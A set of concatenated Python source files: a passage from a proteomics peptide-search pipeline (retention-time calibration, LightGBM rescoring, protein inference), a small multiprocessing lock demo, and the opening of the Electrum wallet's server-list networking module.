                    XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(0.1, RT_left, RT_right, rt_diff_tmp)
                if np.isinf(covvalue):
                    XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(1.0, RT_left, RT_right, rt_diff_tmp)
                print('Calibrated RT shift: ', XRT_shift)
                print('Calibrated RT sigma: ', XRT_sigma)
                print(aa, bb, RR, ss)
        best_sigma = XRT_sigma
        RT_sigma = XRT_sigma
    else:
        print('No matches found')
    # Optional second RT stage: retrain on peptides within 3 sigma of the
    # first-stage fit. NOTE(review): assumes the 'No matches found' branch
    # was not taken (ns/nr/XRT_* must exist here).
    if args['ts']:
        print('Running second stage RT prediction...')
        ns = np.array(ns)
        nr = np.array(nr)
        idx = np.abs((rt_diff_tmp) - XRT_shift) <= 3 * XRT_sigma
        ns = ns[idx]
        nr = nr[idx]
        if deeplc_path:
            outtrain_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
            outtrain = open(outtrain_name, 'w')
            outres_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
            print('Peptides used for RT prediction: %d' % (len(ns), ))
            ll = len(ns)
            ns = ns[:ll]
            nr = nr[:ll]
            outtrain.write('seq,modifications,tr\n')
            for seq, RT in zip(ns, nr):
                mods_tmp = '|'.join([str(idx+1)+'|Carbamidomethyl' for idx, aa in enumerate(seq) if aa == 'C'])
                outtrain.write(seq + ',' + str(mods_tmp) + ',' + str(RT) + '\n')
            outtrain.close()
            subprocess.call([deeplc_path, '--file_pred', outtrain_name, '--file_cal', outtrain_name, '--file_pred_out', outres_name])
            pepdict = dict()
            train_RT = []
            train_seq = []
            for x in open(outres_name).readlines()[1:]:
                _, seq, _, RTexp, RT = x.strip().split(',')
                pepdict[seq] = float(RT)
                train_seq.append(seq)
                train_RT.append(float(RTexp))
            train_RT = np.array(train_RT)
            RT_pred = np.array([pepdict[s] for s in train_seq])
            rt_diff_tmp = RT_pred - train_RT
            RT_left = -min(rt_diff_tmp)
            RT_right = max(rt_diff_tmp)
            try:
                start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 100
                XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
            except:
                start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 50
                XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
            if np.isinf(covvalue):
                XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(0.1, RT_left, RT_right, rt_diff_tmp)
            if np.isinf(covvalue):
                XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(1.0, RT_left, RT_right, rt_diff_tmp)
            print('Calibrated RT shift: ', XRT_shift)
            print('Calibrated RT sigma: ', XRT_sigma)
            aa, bb, RR, ss = aux.linear_regression(RT_pred, train_RT)
        else:
            if elude_path:
                outtrain_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
                outtrain = open(outtrain_name, 'w')
                outres_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
                print(len(ns))
                ll = len(ns)
                ns = ns[:ll]
                nr = nr[:ll]
                for seq, RT in zip(ns, nr):
                    outtrain.write(seq + '\t' + str(RT) + '\n')
                outtrain.close()
                subprocess.call([elude_path, '-t', outtrain_name, '-e', outtrain_name, '-a', '-g', '-o', outres_name])
                pepdict = dict()
                train_RT = []
                train_seq = []
                for x in open(outres_name).readlines()[3:]:
                    seq, RT, RTexp = x.strip().split('\t')
                    pepdict[seq] = float(RT)
                    train_seq.append(seq)
                    train_RT.append(float(RTexp))
                train_RT = np.array(train_RT)
                RT_pred = np.array([pepdict[s] for s in train_seq])
                rt_diff_tmp = RT_pred - train_RT
                RT_left = -min(rt_diff_tmp)
                RT_right = max(rt_diff_tmp)
                start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 50
                XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
                if np.isinf(covvalue):
                    XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(0.1, RT_left, RT_right, rt_diff_tmp)
                if np.isinf(covvalue):
                    XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(1.0, RT_left, RT_right, rt_diff_tmp)
                print('Calibrated RT shift: ', XRT_shift)
                print('Calibrated RT sigma: ', XRT_sigma)
                aa, bb, RR, ss = aux.linear_regression(RT_pred, train_RT)
            else:
                RC = achrom.get_RCs_vary_lcp(ns, nr)
                RT_pred = np.array([achrom.calculate_RT(s, RC) for s in ns])
                aa, bb, RR, ss = aux.linear_regression(RT_pred, nr)
                rt_diff_tmp = RT_pred - nr
                RT_left = -min(rt_diff_tmp)
                RT_right = max(rt_diff_tmp)
                start_width = (scoreatpercentile(rt_diff_tmp, 95) - scoreatpercentile(rt_diff_tmp, 5)) / 50
                XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(start_width, RT_left, RT_right, rt_diff_tmp)
                if np.isinf(covvalue):
                    XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(0.1, RT_left, RT_right, rt_diff_tmp)
                if np.isinf(covvalue):
                    XRT_shift, XRT_sigma, covvalue = calibrate_RT_gaus(1.0, RT_left, RT_right, rt_diff_tmp)
                print('Calibrated RT shift: ', XRT_shift)
                print('Calibrated RT sigma: ', XRT_sigma)
                print(aa, bb, RR, ss)
        best_sigma = XRT_sigma
        RT_sigma = XRT_sigma
    out_log.write('Calibrated RT shift: %s\n' % (XRT_shift, ))
    out_log.write('Calibrated RT sigma: %s\n' % (XRT_sigma, ))
    out_log.close()
    # Stage 5: predict RT for every remaining candidate peptide.
    p1 = set(resdict['seqs'])
    n = args['nproc']
    if deeplc_path:
        pepdict = dict()
        outtrain_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
        outtrain = open(outtrain_name, 'w')
        outres_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
        outtrain.write('seq,modifications,tr\n')
        for seq, RT in zip(ns, nr):
            mods_tmp = '|'.join([str(idx+1)+'|Carbamidomethyl' for idx, aa in enumerate(seq) if aa == 'C'])
            outtrain.write(seq + ',' + str(mods_tmp) + ',' + str(RT) + '\n')
        outtrain.close()
        outtest_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
        outtest = open(outtest_name, 'w')
        outtest.write('seq,modifications\n')
        for seq in p1:
            mods_tmp = '|'.join([str(idx+1)+'|Carbamidomethyl' for idx, aa in enumerate(seq) if aa == 'C'])
            outtest.write(seq + ',' + str(mods_tmp) + '\n')
        outtest.close()
        if args['deeplc_library']:
            print('Using deeplc library...')
            subprocess.call([deeplc_path, '--file_pred', outtest_name, '--file_cal', outtrain_name, '--file_pred_out', outres_name, '--use_library', args['deeplc_library'], '--write_library'])
        else:
            subprocess.call([deeplc_path, '--file_pred', outtest_name, '--file_cal', outtrain_name, '--file_pred_out', outres_name])
        for x in open(outres_name).readlines()[1:]:
            _, seq, _, RT = x.strip().split(',')
            pepdict[seq] = float(RT)
    else:
        # ELUDE/achrom path: fan out over worker_RT processes unless on
        # Windows or single-process mode.
        if n == 1 or os.name == 'nt':
            qin = list(p1)
            qout = []
            if elude_path:
                pepdict = worker_RT(qin, qout, 0, 1, False, elude_path, ns, nr, True)
            else:
                pepdict = worker_RT(qin, qout, 0, 1, RC, False, False, False, True)
        else:
            qin = list(p1)
            qout = Queue()
            procs = []
            for i in range(n):
                if elude_path:
                    p = Process(target=worker_RT, args=(qin, qout, i, n, False, elude_path, ns, nr))
                else:
                    p = Process(target=worker_RT, args=(qin, qout, i, n, RC, False, False, False))
                p.start()
                procs.append(p)
            pepdict = dict()
            for _ in range(n):
                for item in iter(qout.get, None):
                    for k, v in item.items():
                        pepdict[k] = v
            for p in procs:
                p.join()
    # Keep matches within 3 sigma of the RT model (chi-square <= 9).
    rt_pred = np.array([pepdict[s] for s in resdict['seqs']])
    rt_diff = np.array([rts[iorig] for iorig in resdict['iorig']]) - rt_pred
    # rt_diff = resdict['rt'] - rt_pred
    e_all = (rt_diff) ** 2 / (RT_sigma ** 2)
    r = 9.0
    e_ind = e_all <= r
    resdict = filter_results(resdict, e_ind)
    rt_diff = rt_diff[e_ind]
    rt_pred = rt_pred[e_ind]
    # Write per-protein theoretical peptide counts and the PFM table.
    with open(base_out_name + '_protsN.tsv', 'w') as output:
        output.write('dbname\ttheor peptides\n')
        for k, v in protsN.items():
            output.write('\t'.join((k, str(v))) + '\n')
    with open(base_out_name + '_PFMs.tsv', 'w') as output:
        output.write('sequence\tmass diff\tRT diff\tpeak_id\tIntensity\tnScans\tnIsotopes\tproteins\tm/z\tRT\taveragineCorr\tcharge\tion_mobility\n')
        # for seq, md, rtd, peak_id, I, nScans, nIsotopes, mzr, rtr, av, ch, im in zip(resdict['seqs'], resdict['md'], rt_diff, resdict['ids'], resdict['Is'], resdict['Scans'], resdict['Isotopes'], resdict['mzraw'], resdict['rt'], resdict['av'], resdict['ch'], resdict['im']):
        for seq, md, rtd, iorig in zip(resdict['seqs'], resdict['md'], rt_diff, resdict['iorig']):
            peak_id = ids[iorig]
            I = Is[iorig]
            nScans = Scans[iorig]
            nIsotopes = Isotopes[iorig]
            mzr = mzraw[iorig]
            rtr = rts[iorig]
            av = avraw[iorig]
            ch = charges[iorig]
            im = imraw[iorig]
            output.write('\t'.join((seq, str(md), str(rtd), str(peak_id), str(I), str(nScans), str(nIsotopes), ';'.join(pept_prot[seq]), str(mzr), str(rtr), str(av), str(ch), str(im))) + '\n')
    e_ind = resdict['mc'] == 0
    resdict = filter_results(resdict, e_ind)
    rt_diff = rt_diff[e_ind]
    rt_pred = rt_pred[e_ind]
    # Normalized (z-score) mass and RT errors used as ML features below.
    mass_diff = (resdict['md'] - mass_shift) / (mass_sigma)
    rt_diff = (np.array([rts[iorig] for iorig in resdict['iorig']]) - rt_pred) / RT_sigma
    # rt_diff = (resdict['rt'] - rt_pred) / RT_sigma
    prefix = 'DECOY_'
    isdecoy = lambda x: x[0].startswith(prefix)
    isdecoy_key = lambda x: x.startswith(prefix)
    escore = lambda x: -x[1]
    SEED = 42
    # Hyperparameter grid
    param_grid = {
        'boosting_type': ['gbdt', ],
        'num_leaves': list(range(10, 1000)),
        'learning_rate': list(np.logspace(np.log10(0.001), np.log10(0.05), base = 10, num = 1000)),
        'metric': ['rmse', ],
        'verbose': [-1, ],
        'num_threads': [args['nproc'], ],
    }
    # --- nested helpers for the LightGBM rescoring of PFMs ---
    def get_X_array(df, feature_columns):
        # Feature matrix for model input.
        return df.loc[:, feature_columns].values
    def get_Y_array_pfms(df):
        # Target: decoy flag (True for decoy PFMs).
        return df.loc[:, 'decoy'].values
    def get_features_pfms(dataframe):
        # All columns except identifiers, targets and leak-prone fields.
        feature_columns = dataframe.columns
        columns_to_remove = []
        banned_features = {
            'iorig',
            'ids',
            'seqs',
            'decoy',
            'preds',
            'av',
            'Scans',
            'proteins',
            'peptide',
            'md',
        }
        for feature in feature_columns:
            if feature in banned_features:
                columns_to_remove.append(feature)
        feature_columns = feature_columns.drop(columns_to_remove)
        return feature_columns
    def objective_pfms(df, hyperparameters, iteration, threshold=0):
        """Objective function for grid and random search. Returns
           the cross validation score from a set of hyperparameters."""
        all_res = []
        # Group-aware 3-fold CV: all PFMs of one peptide stay in one fold.
        groups = df['peptide']
        ix = df.index.values
        unique = np.unique(groups)
        np.random.RandomState(SEED).shuffle(unique)
        result = []
        for split in np.array_split(unique, 3):
            mask = groups.isin(split)
            train, test = ix[~mask], ix[mask]
            train_df = df.iloc[train]
            test_df = df.iloc[test]
            feature_columns = get_features_pfms(df)
            model = get_cat_model_final_pfms(train_df, hyperparameters, feature_columns)
            df.loc[mask, 'preds'] = model.predict(get_X_array(df.loc[mask, :], feature_columns))
            train_df = df.iloc[train]
            test_df = df.iloc[test]
            fpr, tpr, thresholds = metrics.roc_curve(get_Y_array_pfms(test_df), test_df['preds'])
            shr_v = metrics.auc(fpr, tpr)
            # shr_v = len(aux.filter(test_df, fdr=0.25, key='preds', is_decoy='decoy'))
            all_res.append(shr_v)
            # print(shr_v)
            # Early abort when a fold under-performs the running threshold.
            if shr_v < threshold:
                all_res = [0, ]
                break
        shr_v = np.mean(all_res)
        # print(shr_v)
        # print('\n')
        return [shr_v, hyperparameters, iteration, all_res]
    def random_search_pfms(df, param_grid, out_file, max_evals):
        """Random search for hyperparameter optimization.
           Writes result of search to csv file every search iteration."""
        threshold = 0
        # Dataframe for results
        results = pd.DataFrame(columns = ['sharpe', 'params', 'iteration', 'all_res'],
                               index = list(range(max_evals)))
        for i in range(max_evals):
            print('%d/%d' % (i+1, max_evals))
            # Choose random hyperparameters
            random_params = {k: random.sample(v, 1)[0] for k, v in param_grid.items()}
            # Evaluate randomly selected hyperparameters
            eval_results = objective_pfms(df, random_params, i, threshold)
            results.loc[i, :] = eval_results
            threshold = max(threshold, np.mean(eval_results[3]) - 3 * np.std(eval_results[3]))
            # open connection (append option) and write results
            of_connection = open(out_file, 'a')
            writer = csv.writer(of_connection)
            writer.writerow(eval_results)
            # make sure to close connection
            of_connection.close()
        # Sort with best score on top
        results.sort_values('sharpe', ascending = False, inplace = True)
        results.reset_index(inplace = True)
        return results
    def get_cat_model_pfms(df, hyperparameters, feature_columns, train, test):
        # Train with early stopping against a held-out validation fold.
        feature_columns = list(feature_columns)
        dtrain = lgb.Dataset(get_X_array(train, feature_columns), get_Y_array_pfms(train), feature_name=feature_columns, free_raw_data=False)
        dvalid = lgb.Dataset(get_X_array(test, feature_columns), get_Y_array_pfms(test), feature_name=feature_columns, free_raw_data=False)
        np.random.seed(SEED)
        evals_result = {}
        model = lgb.train(hyperparameters, dtrain, num_boost_round=5000, valid_sets=(dvalid,), valid_names=('valid',), verbose_eval=False,
                          early_stopping_rounds=20, evals_result=evals_result)
        return model
    def get_cat_model_final_pfms(df, hyperparameters, feature_columns):
        # Final model: fixed 100 boosting rounds, no validation set.
        feature_columns = list(feature_columns)
        train = df
        dtrain = lgb.Dataset(get_X_array(train, feature_columns), get_Y_array_pfms(train), feature_name=feature_columns, free_raw_data=False)
        np.random.seed(SEED)
        model = lgb.train(hyperparameters, dtrain, num_boost_round=100)
        return model
    # Build the PFM feature table from the surviving matches.
    df1 = pd.DataFrame()
    for k in resdict.keys():
        df1[k] = resdict[k]
    df1['ids'] = df1['iorig'].apply(lambda x: ids[x])
    df1['Is'] = df1['iorig'].apply(lambda x: Is[x])
    df1['Scans'] = df1['iorig'].apply(lambda x: Scans[x])
    df1['Isotopes'] = df1['iorig'].apply(lambda x: Isotopes[x])
    df1['mzraw'] = df1['iorig'].apply(lambda x: mzraw[x])
    df1['rt'] = df1['iorig'].apply(lambda x: rts[x])
    df1['av'] = df1['iorig'].apply(lambda x: avraw[x])
    df1['ch'] = df1['iorig'].apply(lambda x: charges[x])
    df1['im'] = df1['iorig'].apply(lambda x: imraw[x])
    df1['mass_diff'] = mass_diff
    df1['rt_diff'] = rt_diff
    # A PFM is a decoy only if every parent protein is a decoy.
    df1['decoy'] = df1['seqs'].apply(lambda x: all(z.startswith(prefix) for z in pept_prot[x]))
    df1['peptide'] = df1['seqs']
    # Physico-chemical descriptors per unique peptide (0 on parse failure).
    mass_dict = {}
    pI_dict = {}
    charge_dict = {}
    for pep in set(df1['peptide']):
        try:
            mass_dict[pep] = mass.fast_mass2(pep)
            pI_dict[pep] = electrochem.pI(pep)
            charge_dict[pep] = electrochem.charge(pep, pH=7.0)
        except:
            mass_dict[pep] = 0
            pI_dict[pep] = 0
            charge_dict[pep] = 0
    df1['plen'] = df1['peptide'].apply(lambda z: len(z))
    df1['mass'] = df1['peptide'].apply(lambda x: mass_dict[x])
    df1['pI'] = df1['peptide'].apply(lambda x: pI_dict[x])
    df1['charge_theor'] = df1['peptide'].apply(lambda x: charge_dict[x])
    df1['rt_diff_abs'] = df1['rt_diff'].abs()
    df1['rt_diff_abs_pdiff'] = df1['rt_diff_abs'] - df1.groupby('ids')['rt_diff_abs'].transform('median')
    df1['rt_diff_abs_pnorm'] = df1['rt_diff_abs'] / (df1.groupby('ids')['rt_diff_abs'].transform('sum') + 1e-2)
    df1['id_count'] = df1.groupby('ids')['mass_diff'].transform('count')
    df1['seq_count'] = df1.groupby('peptide')['mass_diff'].transform('count')
    df1t5 = df1.sort_values(by='Is', ascending=False).copy()
    df1t5 = df1t5.drop_duplicates(subset='peptide', keep='first')
    # Optional ML rescoring: random search for LightGBM hyperparameters,
    # then group-aware out-of-fold predictions.
    if args['ml']:
        print('Start Machine Learning on PFMs...')
        print('Features used for MachineLearning: ', get_features_pfms(df1))
        MAX_EVALS = 25
        out_file = 'test_randomCV_PFMs_2.tsv'
        of_connection = open(out_file, 'w')
        writer = csv.writer(of_connection)
        # Write column names
        headers = ['auc', 'params', 'iteration', 'all_res']
        writer.writerow(headers)
        of_connection.close()
        random_results = random_search_pfms(df1, param_grid, out_file, MAX_EVALS)
        random_results = pd.read_csv(out_file)
        random_results = random_results[random_results['auc'] != 'auc']
        random_results['params'] = random_results['params'].apply(lambda x: ast.literal_eval(x))
        convert_dict = {'auc': float,
                        }
        random_results = random_results.astype(convert_dict)
        bestparams = random_results.sort_values(by='auc',ascending=False)['params'].values[0]
        bestparams['num_threads'] = args['nproc']
        print(random_results.sort_values(by='auc',ascending=False)['auc'].values[0])
        groups = df1['peptide']
        ix = df1.index.values
        unique = np.unique(groups)
        np.random.RandomState(SEED).shuffle(unique)
        result = []
        for split in np.array_split(unique, 3):
            mask = groups.isin(split)
            train, test = ix[~mask], ix[mask]
            train_df = df1.iloc[train]
            test_df = df1.iloc[test]
            feature_columns = list(get_features_pfms(train_df))
            model = get_cat_model_final_pfms(train_df, bestparams, feature_columns)
            df1.loc[test, 'preds'] = model.predict(get_X_array(test_df, feature_columns))
    else:
        # Fallback score: combined squared mass/RT z-scores.
        df1['preds'] = np.power(df1['mass_diff'], 2) + np.power(df1['rt_diff'], 2)
    # Decile-binned score used downstream as a discrete quality class.
    df1['qpreds'] = pd.qcut(df1['preds'], 10, labels=range(10))
    df1['proteins'] = df1['seqs'].apply(lambda x: ';'.join(pept_prot[x]))
    df1.to_csv(base_out_name + '_PFMs_ML.tsv', sep='\t', index=False)
    resdict['qpreds'] = df1['qpreds'].values
    resdict['ids'] = df1['ids'].values
    mass_diff = resdict['qpreds']
    rt_diff = resdict['qpreds']
    # Stage 6: final protein scoring and iterative inference.
    p1 = set(resdict['seqs'])
    prots_spc2 = defaultdict(set)
    for pep, proteins in pept_prot.items():
        if pep in p1:
            for protein in proteins:
                prots_spc2[protein].add(pep)
    for k in protsN:
        if k not in prots_spc2:
            prots_spc2[k] = set([])
    prots_spc = dict((k, len(v)) for k, v in prots_spc2.items())
    names_arr = np.array(list(prots_spc.keys()))
    v_arr = np.array(list(prots_spc.values()))
    n_arr = np.array([protsN[k] for k in prots_spc])
    top100decoy_score = [prots_spc.get(dprot, 0) for dprot in protsN if isdecoy_key(dprot)]
    top100decoy_N = [val for key, val in protsN.items() if isdecoy_key(key)]
    p = np.mean(top100decoy_score) / np.mean(top100decoy_N)
    print('p=%s' % (np.mean(top100decoy_score) / np.mean(top100decoy_N)))
    prots_spc = dict()
    all_pvals = calc_sf_all(v_arr, n_arr, p)
    for idx, k in enumerate(names_arr):
        prots_spc[k] = all_pvals[idx]
    final_iteration(resdict, mass_diff, rt_diff, pept_prot, protsN, base_out_name, prefix, isdecoy, isdecoy_key, escore, fdr, args['nproc'], fname)
def worker(qin, qout, mass_diff, rt_diff, resdict, protsN, pept_prot, isdecoy_key, isdecoy, fdr, prots_spc_basic2, win_sys=False):
    """Iterative protein-inference worker.

    Consumes ``(mass_koef, rtt_koef)`` threshold pairs from *qin* (a
    multiprocessing queue, or a plain list when ``win_sys`` is True), filters
    the matches by ``mass_diff <= mass_koef``, and greedily assigns peptides
    to their best-scoring protein, re-scoring after each assignment until
    the running protein FDR exceeds ``12.5 * fdr``.  Puts
    ``(prots_spc_final, item2)`` per work item on *qout* (``item2`` is the
    raw per-protein peptide counts when ``mass_koef == 9``, else False),
    followed by a ``None`` sentinel; in list mode returns *qout* instead.

    Fixes vs. previous revision: removed a dead recomputation of ``p`` that
    summed all decoy scores on every loop iteration only to be overwritten
    by the incrementally maintained sum; removed the unused ``tmp_spc``
    alias; ``prots_spc_final``/``prots_spc_copy`` are now initialized before
    the ``if len(p1):`` guard so an empty peptide set no longer raises
    NameError when the result is put on the queue.
    """
    for item in (iter(qin.get, None) if not win_sys else qin):
        mass_koef, rtt_koef = item  # rtt_koef is currently unused here
        e_ind = mass_diff <= mass_koef
        resdict2 = filter_results(resdict, e_ind)
        # Best-scoring parent protein for every peptide, using the
        # pre-computed protein scores in prots_spc_basic2.
        features_dict = dict()
        for pep in set(resdict2['seqs']):
            for bprot in pept_prot[pep]:
                prot_score = prots_spc_basic2[bprot]
                if prot_score > features_dict.get(pep, [-1, ])[-1]:
                    features_dict[pep] = (bprot, prot_score)
        prots_spc_basic = dict()
        p1 = set(resdict2['seqs'])
        # Peptide <-> feature-id maps and per-peptide occurrence counts.
        pep_pid = defaultdict(set)
        pid_pep = defaultdict(set)
        banned_dict = dict()
        for pep, pid in zip(resdict2['seqs'], resdict2['ids']):
        # for pep, pid in zip(resdict2['seqs'], [ids[iorig] for iorig in resdict2['iorig']]):
            pep_pid[pep].add(pid)
            pid_pep[pid].add(pep)
            if pep in banned_dict:
                banned_dict[pep] += 1
            else:
                banned_dict[pep] = 1
        # Defined before the guard so the qout.put below is always valid,
        # even when no peptides survive the mass filter.
        prots_spc_final = dict()
        prots_spc_copy = False
        if len(p1):
            prots_spc2 = False
            unstable_prots = set()
            p0 = False
            names_arr = False
            tmp_spc_new = False
            decoy_set = False
            while 1:
                # One-time setup on the first iteration: protein -> peptide
                # sets (restricted to each peptide's best protein), decoy
                # bookkeeping, and score arrays.
                if not prots_spc2:
                    best_match_dict = dict()
                    n_map_dict = defaultdict(list)
                    for k, v in protsN.items():
                        n_map_dict[v].append(k)
                    decoy_set = set()
                    for k in protsN:
                        if isdecoy_key(k):
                            decoy_set.add(k)
                    decoy_set = list(decoy_set)
                    prots_spc2 = defaultdict(set)
                    for pep, proteins in pept_prot.items():
                        if pep in p1:
                            for protein in proteins:
                                if protein == features_dict[pep][0]:
                                    prots_spc2[protein].add(pep)
                    for k in protsN:
                        if k not in prots_spc2:
                            prots_spc2[k] = set([])
                    prots_spc2 = dict(prots_spc2)
                    unstable_prots = set(prots_spc2.keys())
                    top100decoy_N = sum([val for key, val in protsN.items() if isdecoy_key(key)])
                    names_arr = np.array(list(prots_spc2.keys()))
                    n_arr = np.array([protsN[k] for k in names_arr])
                    tmp_spc_new = dict((k, len(v)) for k, v in prots_spc2.items())
                    top100decoy_score_tmp = [tmp_spc_new.get(dprot, 0) for dprot in decoy_set]
                    top100decoy_score_tmp_sum = float(sum(top100decoy_score_tmp))
                prots_spc = tmp_spc_new
                if not prots_spc_copy:
                    prots_spc_copy = deepcopy(prots_spc)
                # Incrementally maintain the decoy score sum: only proteins
                # touched in the previous iteration can have changed.
                for idx, v in enumerate(decoy_set):
                    if v in unstable_prots:
                        top100decoy_score_tmp_sum -= top100decoy_score_tmp[idx]
                        top100decoy_score_tmp[idx] = prots_spc.get(v, 0)
                        top100decoy_score_tmp_sum += top100decoy_score_tmp[idx]
                p = top100decoy_score_tmp_sum / top100decoy_N
                if not p0:
                    p0 = float(p)
                # Track the best-scoring protein per theoretical-peptide
                # count, re-checking only counts whose proteins changed.
                n_change = set(protsN[k] for k in unstable_prots)
                for n_val in n_change:
                    for k in n_map_dict[n_val]:
                        v = prots_spc[k]
                        if n_val not in best_match_dict or v > prots_spc[best_match_dict[n_val]]:
                            best_match_dict[n_val] = k
                n_arr_small = []
                names_arr_small = []
                v_arr_small = []
                for k, v in best_match_dict.items():
                    n_arr_small.append(k)
                    names_arr_small.append(v)
                    v_arr_small.append(prots_spc[v])
                prots_spc_basic = dict()
                all_pvals = calc_sf_all(np.array(v_arr_small), n_arr_small, p)
                for idx, k in enumerate(names_arr_small):
                    prots_spc_basic[k] = all_pvals[idx]
                best_prot = utils.keywithmaxval(prots_spc_basic)
                best_score = prots_spc_basic[best_prot]
                unstable_prots = set()
                if best_prot not in prots_spc_final:
                    # Accept the best protein and release its peptides'
                    # features from all competing proteins.
                    prots_spc_final[best_prot] = best_score
                    banned_pids = set()
                    for pep in prots_spc2[best_prot]:
                        for pid in pep_pid[pep]:
                            banned_pids.add(pid)
                    for pid in banned_pids:
                        for pep in pid_pep[pid]:
                            banned_dict[pep] -= 1
                            if banned_dict[pep] == 0:
                                best_prot_val = features_dict[pep][0]
                                for bprot in pept_prot[pep]:
                                    if bprot == best_prot_val:
                                        tmp_spc_new[bprot] -= 1
                                        unstable_prots.add(bprot)
                else:
                    # No new protein could be accepted: flush the remaining
                    # scores and stop.
                    v_arr = np.array([prots_spc[k] for k in names_arr])
                    all_pvals = calc_sf_all(v_arr, n_arr, p)
                    for idx, k in enumerate(names_arr):
                        prots_spc_basic[k] = all_pvals[idx]
                    for k, v in prots_spc_basic.items():
                        if k not in prots_spc_final:
                            prots_spc_final[k] = v
                    break
                try:
                    prot_fdr = aux.fdr(prots_spc_final.items(), is_decoy=isdecoy)
                except ZeroDivisionError:
                    prot_fdr = 100.0
                if prot_fdr >= 12.5 * fdr:
                    # FDR budget exhausted: flush remaining scores and stop.
                    v_arr = np.array([prots_spc[k] for k in names_arr])
                    all_pvals = calc_sf_all(v_arr, n_arr, p)
                    for idx, k in enumerate(names_arr):
                        prots_spc_basic[k] = all_pvals[idx]
                    for k, v in prots_spc_basic.items():
                        if k not in prots_spc_final:
                            prots_spc_final[k] = v
                    break
        if mass_koef == 9:
            item2 = prots_spc_copy
        else:
            item2 = False
        if not win_sys:
            qout.put((prots_spc_final, item2))
        else:
            qout.append((prots_spc_final, item2))
    if not win_sys:
        qout.put(None)
    else:
        return qout
|
mutex.py | from multiprocessing import Process, Lock
mutex = Lock()  # module-level lock serializing print output across worker processes
def processData(data):
    """Print *data* while holding the module-wide lock, so output from
    concurrent worker processes is serialized."""
    with mutex:
        print(data)
if __name__ == '__main__':
    while True:
        some_data = "This is the data"
        p = Process(target = processData, args = (some_data,))
        p.start()
        # Wait for the child before spawning the next one: the original
        # loop forked processes without ever joining them, accumulating
        # unreaped children without bound.
        p.join()
network.py | # Electrum - Lightweight Electrum Client
# Copyright (c) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import time
import queue
import os
import stat
import errno
import random
import re
import select
from collections import defaultdict
import threading
import socket
import json
import socks
from . import util
from . import bitcoin
from .bitcoin import *
from .blockchain import *
from . import constants
from .interface import Connection, Interface
from . import blockchain
from .version import ELECTRUM_VERSION, PROTOCOL_VERSION
from .i18n import _
from . import constants
NODES_RETRY_INTERVAL = 60
SERVER_RETRY_INTERVAL = 10
def parse_servers(result):
    """Parse a 'server.peers.subscribe' result list into a hostmap.

    Each item looks like ``[ip, hostname, [feature, ...]]`` where features
    are strings such as ``s50002`` (SSL port), ``t50001`` (TCP port),
    ``v1.2`` (protocol version) and ``p100`` (pruning level).

    :return: dict mapping hostname -> {'s'/'t': port, 'pruning': level,
        'version': version}; hosts advertising no port are dropped.
    """
    servers = {}
    for item in result:
        host = item[1]
        out = {}
        version = None
        pruning_level = '-'
        if len(item) > 2:
            for v in item[2]:
                # Raw strings: '\d' in a plain literal is an invalid
                # escape sequence (DeprecationWarning since Python 3.6).
                if re.match(r"[st]\d*", v):
                    protocol, port = v[0], v[1:]
                    if port == '': port = constants.net.DEFAULT_PORTS[protocol]
                    out[protocol] = port
                elif re.match(r"v(.?)+", v):
                    version = v[1:]
                elif re.match(r"p\d*", v):
                    pruning_level = v[1:]
                    if pruning_level == '': pruning_level = '0'
        if out:
            out['pruning'] = pruning_level
            out['version'] = version
            servers[host] = out
    return servers
def filter_version(servers):
    """Keep only servers whose advertised version is at least PROTOCOL_VERSION."""
    def is_recent(version):
        # Missing or unparseable versions are treated as too old.
        try:
            recent = util.normalize_version(version) >= util.normalize_version(PROTOCOL_VERSION)
        except Exception:
            recent = False
        return recent
    result = {}
    for server, info in servers.items():
        if is_recent(info.get('version')):
            result[server] = info
    return result
def filter_protocol(hostmap, protocol = 's'):
    """Return the hosts in *hostmap* offering *protocol*, each rendered as
    a serialized 'host:port:protocol' string."""
    return [serialize_server(host, portmap[protocol], protocol)
            for host, portmap in hostmap.items()
            if portmap.get(protocol)]
def pick_random_server(hostmap = None, protocol = 's', exclude_set = frozenset()):
    """Choose one random eligible serialized server string, or None.

